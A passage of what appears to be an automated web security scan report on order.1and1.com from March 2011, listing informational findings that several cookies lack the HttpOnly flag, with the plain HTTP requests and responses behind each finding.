Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:36 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3f8e9c0500a60000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsLinux;jsessionid=DD61330651B1991C158C5E2A1045EF60.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.69. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsWindows

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerVpsOsWindows HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:48 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=517ca537a4bc3c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsWindows;jsessionid=479C7F1B739D311AC711741F227EFA3F.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.70. http://order.1and1.com/xml/order/FeatureSite-buildingAsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingAsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingAsp HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=23f729c028981800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingAsp;jsessionid=90DC64BF5F0BE5FFD3494F531FFC9C21.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.71. http://order.1and1.com/xml/order/FeatureSite-buildingBlog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.72. http://order.1and1.com/xml/order/FeatureSite-buildingBlog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingBlog HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:17 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=243737f9e62df400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingBlog;jsessionid=EF0768155A7F7D2C704B8F00B5188B4C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.73. http://order.1and1.com/xml/order/FeatureSite-buildingCgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCgi HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:52 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=27a6c0dfbabd7800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCgi;jsessionid=720AEC6B9B0A0BAFFB10502C5FA97453.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.74. http://order.1and1.com/xml/order/FeatureSite-buildingCgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:01 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:58:08 GMT; Path=/
ETag: 41dae3a2113aed17c2abdf537c164ae5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17084


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.75. http://order.1and1.com/xml/order/FeatureSite-buildingCnba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCnba HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:11 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=e60106dc2a1f800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCnba;jsessionid=D6CDF4CECE4121FCCF576B5A13F2AD48.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.76. http://order.1and1.com/xml/order/FeatureSite-buildingCnba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.77. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingContentmoduls HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:21 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3451d6a5fb8ed000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls;jsessionid=E709A95999ECBC45D3EBA32D0D1FD636.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.78. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:23 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDInLl5nLSAhHRwhHjI1MDM0LS4=; Expires=Fri, 07-Apr-2079 21:57:30 GMT; Path=/
ETag: abf5727759dd6b49542001d0cd44cd90
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18650


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.79. http://order.1and1.com/xml/order/FeatureSite-buildingDriving  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDriving HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3cd2f340f5d83400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDriving;jsessionid=0AA7D5A30CA9BA9E5AECE5A579B09F5B.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.80. http://order.1and1.com/xml/order/FeatureSite-buildingDriving  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:51 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
